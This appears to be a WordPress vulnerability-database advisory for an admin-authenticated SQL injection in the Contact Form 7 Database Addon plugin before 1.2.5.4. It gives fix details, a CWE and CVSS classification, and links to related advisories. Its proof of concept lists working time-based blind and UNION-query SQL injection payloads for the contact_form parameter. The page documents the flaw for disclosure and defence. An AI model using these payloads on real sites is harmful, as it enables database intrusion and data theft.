WordPress Plugin Vulnerabilities

Contact Form 7 Database Addon < 1.2.5.4 - Authenticated SQL Injections

Description

The plugin did not properly sanitise the form_ids from the contact_form POST array parameter before using them in a SQL statement in the process_bulk_action() function. This could allow high privilege users, such as admin to perform SQL Injection against the DBMS via the bulk actions: delete, read and unread.

Note: Further SQL Injections have been fixed in 1.2.5.7.

Proof of Concept

---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: s=&_wpnonce=16a6b55ed1&contact_form[]=1 AND (SELECT 4559 FROM (SELECT(SLEEP(5)))BVdc)&action2=-1

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: s=&_wpnonce=16a6b55ed1&contact_form[]=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a7a7171,0x545942474c4e416e6864774d4c756c6f684d7569456150706b756f7a465a487173704c476b465243,0x71716b7871),NULL-- -&action2=-1
---

Affects Plugins

Plugin icon
contact-form-cfdb7
Fixed in 1.2.5.4

References

URL
https://plugins.trac.wordpress.org/changeset/2458739

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
9.1 (critical)

Miscellaneous

Verified
Yes
WPVDB ID
75f2eeb2-c413-4601-bc62-554683480c30

Timeline

Publicly Published
2021-01-21 (about 3 years ago)
Added
2021-01-21 (about 3 years ago)
Last Updated
2021-01-25 (about 3 years ago)

Other

Published
Title
Published
2022-07-05
Title
WP Visitor Statistics (Real Time Traffic) < 5.8 - Unauthenticated SQLi
Published
2023-09-25
Title
WPSchoolPress < 2.2.5 - Teacher+ SQLi
Published
2023-10-26
Title
WP Hotel Booking < 2.0.8 - Unauthenticated SQLi
Published
2014-08-01
Title
Malmonation - debate.php id Parameter SQL Injection
Published
2019-07-01
Title
Server Status by Hostname/IP <= 4.6 - Authenticated SQL Injection